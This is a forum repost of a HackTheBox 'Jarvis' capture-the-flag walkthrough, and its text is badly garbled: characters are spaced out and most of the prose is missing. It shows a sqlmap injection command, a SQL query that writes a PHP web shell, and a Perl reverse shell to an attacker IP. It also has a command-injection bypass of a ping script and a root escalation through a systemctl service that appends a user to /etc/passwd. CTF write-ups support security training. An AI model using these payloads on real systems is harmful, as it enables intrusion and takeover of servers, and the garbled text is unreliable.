搜索

[20263] 2019-11-12_Hackthebox-Jarvis

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-18
2019-11-12_Hackthebox-Jarvis H a c k   t h e   b o x - J a r v i s   K h a n   K h a n   2 0 1 9 - 1 1 - 1 2 C T F h a c k t h e b o x J a r v i s h a c k t h e b o x 线 u s e r . t x t r o o t . t x t     m a s s c a n 2 2 8 0 6 4 9 9 9 N m a p 2 2 , 8 0 6 4 9 9 9   8 0 w e b w f u z z w e b 8 0 使 p h p m y a d m i n s h e l l  
  / r o o m . p h p ? c o d = 1 c o d s q l 使 s q l m a p   w e b s q l b a n - - u s e r - a g e n t 使 - - p a s s w o r d s q l m a p   - u   h t t p : / / 1 0 . 1 0 . 1 0 . 1 4 3 / r o o m ? c o d = 1   - - u s e r - a g e n t   " M o z i l l a / 5 . 0   ( X 1 1 ;   L i n u x   x 8 6 _ 6 4 ;   r v : 6 0 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 6 0 . 0     - - p a s s w o r d
D B a d m i n - - i m i s s y o u p h p m y a d m i n w e b s h e l l # s e l e c t   < ? p h p   s y s t e m ( $ _ G E T [ c m d ] ) ;   ? >   i n t o   o u t f i l e   / v a r / w w w / h t m l / n 0 0 b . p h p   s h e l l   使 p e r l s h e l l # p e r l   - e   ' u s e S o c k e t ; $ i = " 1 0 . 1 0 . x . x " ; $ p = x x x x ; s o c k e t ( S , P F _ I N E T , S O C K _ S T R E A M , g e t p r o t o b y n a m e ( " t c p " ) ) ; i f ( c o n n e c t ( S , s o c k a d d r _ i n ( $ p , i n e t _ a t o n ( $ i ) ) ) ) { o p e n ( S T D I N , " > & S " ) ; o p e n ( S T D O U T , " > & S " ) ; o p e n ( S T D E R R , " > & S " ) ; e x e c ( " / b i n / s h   - i " ) ; } ; '   使 T T Y h t t p s : / / b l o g . r o p n o p . c o m / u p g r a d i n g - s i m p l e - s h e l l s - t o - f u l l y - i n t e r a c t i v e - t t y s / T T Y r o o t @ l o c a l h o s t : ~ / p a n g #   n c   - l v p   4 4 4 4 l i s t e n i n g   o n   [ a n y ]   4 4 4 4   . . . 1 0 . 1 0 . 1 0 . 1 4 3 :   i n v e r s e   h o s t   l o o k u p   f a i l e d :   U n k n o w n   h o s t c o n n e c t   t o   [ 1 0 . 1 0 . 1 5 . 2 3 7 ]   f r o m   ( U N K N O W N )   [ 1 0 . 1 0 . 1 0 . 1 4 3 ]   3 5 3 4 2 / b i n / s h :   0 :   c a n ' t   a c c e s s   t t y ;   j o b   c o n t r o l   t u r n e d   o f f $   p y t h o n   - c   ' i m p o r t   p t y ; p t y . s p a w n ( " / b i n / b a s h " ) ' w w w - d a t a @ j a r v i s : / v a r / w w w / h t m l $   ^ Z [ 1 ] +                                   n c   - l v p   4 4 4 4 r o o t @ l o c a l h o s t : ~ / p a n g #   s t t y   r a w   - e c h o r o o t @ l o c a l h o s t : ~ / p a n g #   n c   - l v p   4 4 4 4                                                                       r e s e t r e s e t :   u n k n o w n   t e r m i n a l   t y p e   u n k n o w n T e r m i n a l   t y p e ?   b a s h w w w - d a t a @ j a r v i s : / v a r / w w w / h t m l $   e x p o r t   S H E L L = b a s h w w w - d a t a @ j a r v i s : / v a r / w w w / h t m l $   e x p o r t   T E R M = x t e r m - 2 5 6 c o l o r w w w - d a t a @ j a r v i s : / v a r / w w w / h t m l $   e x p o r t   r o w s   5 4   c o l u m n s   2 0 6     u s e r . t x t
  u s e r . t x t   s u d o   - l 使 s i m p l e . p y j a r v i s   S i m p l e . p y ;   # ! / u s r / b i n / e n v   p y t h o n 3                                                                                                                                                                                                                                                                           f r o m   d a t e t i m e   i m p o r t   d a t e t i m e                                                                                                                                                                                                                                                                                                                                                                 i m p o r t   s y s                                                                                                                                                                                                                                                                                                                                                                                                         i m p o r t   o s                                                                                                                                                                                                                                                                                                                                                                                                           f r o m   o s   i m p o r t   l i s t d i r                                                                                                                                                                                                                                                                                                                                                                               i m p o r t   r e                                                                                                                                                                                                                                                                                                                                                                                                                 d e f   s h o w _ s t a t i s t i c s ( ) :                                                                                                                                                                                                                                                                                                                                                                                       p a t h   =   ' / h o m e / p e p p e r / W e b / L o g s / '                                                                                                                                                                                                                                                                                                                                                             p r i n t ( ' S t a t i s t i c s n - - - - - - - - - - - ' )                                                                                                                                                                                                                                                                                                                                                           l i s t e d _ f i l e s   =   l i s t d i r ( p a t h )         c o u n t   =   l e n ( l i s t e d _ f i l e s )         p r i n t ( ' N u m b e r   o f   A t t a c k e r s :   '   +   s t r ( c o u n t ) )         l e v e l _ 1   =   0         d a t   =   d a t e t i m e ( 1 ,   1 ,   1 )         i p _ l i s t   =   [ ]         r e k s   =   [ ]         i p   =   ' '         r e q   =   ' '         r e k   =   ' '         f o r   i   i n   l i s t e d _ f i l e s :                 f   =   o p e n ( p a t h   +   i ,   ' r ' )                 l i n e s   =   f . r e a d l i n e s ( )                 l e v e l 2 ,   r e k   =   g e t _ m a x _ l e v e l ( l i n e s )                 f e c h a ,   r e q u   =   d a t e _ t o _ n u m ( l i n e s )                 i p   =   i . s p l i t ( ' . ' ) [ 0 ]   +   ' . '   +   i . s p l i t ( ' . ' ) [ 1 ]   +   ' . '   +   i . s p l i t ( ' . ' ) [ 2 ]   +   ' . '   +   i . s p l i t ( ' . ' ) [ 3 ]                 i f   f e c h a   >   d a t :                         d a t   =   f e c h a
                        r e q   =   r e q u                         i p 2   =   i . s p l i t ( ' . ' ) [ 0 ]   +   ' . '   +   i . s p l i t ( ' . ' ) [ 1 ]   +   ' . '   +   i . s p l i t ( ' . ' ) [ 2 ]   +   ' . '   +   i . s p l i t ( ' . ' ) [ 3 ]                 i f   i n t ( l e v e l 2 )   >   i n t ( l e v e l _ 1 ) :                         l e v e l _ 1   =   l e v e l 2                         i p _ l i s t   =   [ i p ]                         r e k s = [ r e k ]                 e l i f   i n t ( l e v e l 2 )   = =   i n t ( l e v e l _ 1 ) :                         i p _ l i s t . a p p e n d ( i p )                         r e k s . a p p e n d ( r e k )                 f . c l o s e ( )         p r i n t ( ' M o s t   R i s k y : ' )         i f   l e n ( i p _ l i s t )   >   1 :                 p r i n t ( ' M o r e   t h a n   1   i p   f o u n d ' )         c o n t   =   0         f o r   i   i n   i p _ l i s t :                 p r i n t ( '         '   +   i   +   '   -   A t t a c k   L e v e l   :   '   +   l e v e l _ 1   +   '   R e q u e s t :   '   +   r e k s [ c o n t ] )                 c o n t   =   c o n t   +   1         p r i n t ( ' M o s t   R e c e n t :   '   +   i p 2   +   '   - - >   '   +   s t r ( d a t )   +   '   '   +   r e q ) d e f   l i s t _ i p ( ) :         p r i n t ( ' A t t a c k e r s n - - - - - - - - - - - ' )         p a t h   =   ' / h o m e / p e p p e r / W e b / L o g s / '         l i s t e d _ f i l e s   =   l i s t d i r ( p a t h )         f o r   i   i n   l i s t e d _ f i l e s :                 f   =   o p e n ( p a t h   +   i , ' r ' )                 l i n e s   =   f . r e a d l i n e s ( )                 l e v e l , r e q   =   g e t _ m a x _ l e v e l ( l i n e s )                 p r i n t ( i . s p l i t ( ' . ' ) [ 0 ]   +   ' . '   +   i . s p l i t ( ' . ' ) [ 1 ]   +   ' . '   +   i . s p l i t ( ' . ' ) [ 2 ]   +   ' . '   +   i . s p l i t ( ' . ' ) [ 3 ]   +   '   -   A t t a c k   L e v e l   :   '   +   l e v e l )                 f . c l o s e ( ) d e f   d a t e _ t o _ n u m ( l i n e s ) :         d a t   =   d a t e t i m e ( 1 , 1 , 1 )         i p   =   ' '         r e q = ' '         f o r   i   i n   l i n e s :                 i f   ' L e v e l '   i n   i :                         f e c h a = ( i . s p l i t ( '   ' ) [ 6 ]   +   '   '   +   i . s p l i t ( '   ' ) [ 7 ] ) . s p l i t ( ' n ' ) [ 0 ]                         r e g e x   =   ' ( d + ) - ( . * ) - ( d + ) ( . * ) '                         l o g E x = r e . m a t c h ( r e g e x ,   f e c h a ) . g r o u p s ( )                         m e s   =   t o _ d i c t ( l o g E x [ 1 ] )                         f e c h a   =   l o g E x [ 0 ]   +   ' - '   +   m e s   +   ' - '   +   l o g E x [ 2 ]   +   '   '   +   l o g E x [ 3 ]                         f e c h a   =   d a t e t i m e . s t r p t i m e ( f e c h a ,   ' % Y - % m - % d   % H : % M : % S ' )                         i f   f e c h a   >   d a t :                                 d a t   =   f e c h a                                 r e q   =   i . s p l i t ( '   ' ) [ 8 ]   +   '   '   +   i . s p l i t ( '   ' ) [ 9 ]   +   '   '   +   i . s p l i t ( '   ' ) [ 1 0 ]         r e t u r n   d a t ,   r e q d e f   t o _ d i c t ( n a m e ) :         m o n t h _ d i c t   =   { ' J a n ' : ' 0 1 ' , ' F e b ' : ' 0 2 ' , ' M a r ' : ' 0 3 ' , ' A p r ' : ' 0 4 ' ,   ' M a y ' : ' 0 5 ' ,   ' J u n ' : ' 0 6 ' , ' J u l ' : ' 0 7 ' , ' A u g ' : ' 0 8 ' , ' S e p ' : ' 0 9 ' , ' O c t ' : ' 1 0 ' , ' N o v ' : ' 1 1 ' , ' D e c ' : ' 1 2 ' }         r e t u r n   m o n t h _ d i c t [ n a m e ]
d e f   g e t _ m a x _ l e v e l ( l i n e s ) :         l e v e l = 0         f o r   j   i n   l i n e s :                 i f   ' L e v e l '   i n   j :                         i f   i n t ( j . s p l i t ( '   ' ) [ 4 ] )   >   i n t ( l e v e l ) :                                 l e v e l   =   j . s p l i t ( '   ' ) [ 4 ]                                 r e q = j . s p l i t ( '   ' ) [ 8 ]   +   '   '   +   j . s p l i t ( '   ' ) [ 9 ]   +   '   '   +   j . s p l i t ( '   ' ) [ 1 0 ]         r e t u r n   l e v e l ,   r e q d e f   e x e c _ p i n g ( ) :         f o r b i d d e n   =   [ ' & ' ,   ' ; ' ,   ' - ' ,   ' ` ' ,   ' | | ' ,   ' | ' ]         c o m m a n d   =   i n p u t ( ' E n t e r   a n   I P :   ' )         f o r   i   i n   f o r b i d d e n :                 i f   i   i n   c o m m a n d :                         p r i n t ( ' G o t   y o u ' )                         e x i t ( )         o s . s y s t e m ( ' p i n g   '   +   c o m m a n d ) i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' :         s h o w _ h e a d e r ( )         i f   l e n ( s y s . a r g v )   ! =   2 :                 s h o w _ h e l p ( )                 e x i t ( )         i f   s y s . a r g v [ 1 ]   = =   ' - h '   o r   s y s . a r g v [ 1 ]   = =   ' - - h e l p ' :                 s h o w _ h e l p ( )                 e x i t ( )         e l i f   s y s . a r g v [ 1 ]   = =   ' - s ' :                 s h o w _ s t a t i s t i c s ( )                 e x i t ( )         e l i f   s y s . a r g v [ 1 ]   = =   ' - l ' :                 l i s t _ i p ( )                 e x i t ( )         e l i f   s y s . a r g v [ 1 ]   = =   ' - p ' :                 e x e c _ p i n g ( )                 e x i t ( )         e l s e :                 s h o w _ h e l p ( )                 e x i t ( ) e x e c _ p i n g ( ) ( &   ;   -   `   | |     | ) $ $ ( b a s h ) p i n g   - c   1   $ ( e c h o   1 2 7 . 0 . 0 . 1 ) e c h o   1 2 7 . 0 . 0 . 1 p i n g
使 使 p e r l s h e l l u s e r . t x t   s u i d s y s t e m c t l s y s t e m c t l s y s t e m d h t t p s : / / g t f o b i n s . g i t h u b . i o / g t f o b i n s / s y s t e m c t l / s y s t e m c t l s u i d 1 r o o t . s e r v i c e s h 使 p e r l # p e r l   - l e   ' p r i n t   c r y p t ( " p a s s w o r d @ 1 2 3 " , " a d d e d s a l t " ) ' / d e v / s h m / r o o t . s h # e c h o   r o o o t : a d v w t v / 9 y U 5 y Q : 0 : 0 : r o o t : / r o o t : / b i n / b a s h "   > >   / e t c / p a s s w d 使 r o o t . s h # c h m o d   + x   / d e v / s h m / r o o t . s h r o o t . s e r v i c e # s y s t e m c t l   e n a b l e   / d e v / s h m / r o o o t . s e r v i c e # s y s t e m c t l   s t a r t   / d e v / s h m / r o o o t . s e r v i c e / e t c / p a s s w d / e t c / p a s s w d s u   r o o o t i d r o o t
  r o o t . t x t h t t p s : / / h a c k s o . m e / j a r v i s - h t b - w a l k t h r o u g h /                                                                                                             -   K h a n
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理